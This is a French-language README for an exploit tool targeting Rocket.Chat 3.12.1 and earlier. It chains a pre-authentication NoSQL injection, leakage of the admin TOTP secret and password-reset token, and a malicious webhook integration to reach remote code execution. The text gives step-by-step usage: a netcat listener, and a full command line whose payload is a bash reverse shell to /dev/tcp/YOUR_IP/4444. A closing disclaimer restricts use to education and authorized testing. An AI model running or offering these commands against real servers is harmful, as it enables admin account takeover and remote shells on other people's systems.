
Exploit pour Rocket.Chat 3.12.1 RCE via injection NoSQL pré-authentification, fuite du secret TOTP admin et du jeton de réinitialisation de mot de passe pour exécution de code à distance via une intégration de webhook malveillante.
Exploite une vulnérabilité d'injection NoSQL pré-authentification dans Rocket.Chat 3.12.1 pour divulguer le secret TOTP de l'administrateur et le jeton de réinitialisation de mot de passe, prendre le contrôle du compte administrateur et atteindre une RCE via une intégration de webhook malveillante.
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
Avant d'exécuter l'exploit, lancez un listener netcat dans un terminal séparé pour capturer le shell inverse entrant :
nc -lvnp 4444
Gardez ce terminal ouvert. Une fois l'exploit exécuté avec succès, votre shell apparaîtra ici.
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
| Option | Description |
|---|---|
-t | URL cible de Rocket.Chat |
-u | Votre nom d'utilisateur enregistré avec privilèges réduits |
-p | Votre mot de passe enregistré avec privilèges réduits |
-e | Adresse email de l'administrateur |
-a | Nom d'utilisateur de l'administrateur |
-c | Commande du shell inverse |
-v | Mode verbeux (affiche les réponses brutes) |
Cet outil est destiné uniquement à des fins éducatives et à des tests de pénétration autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil. Obtenez toujours une autorisation écrite appropriée avant de tester.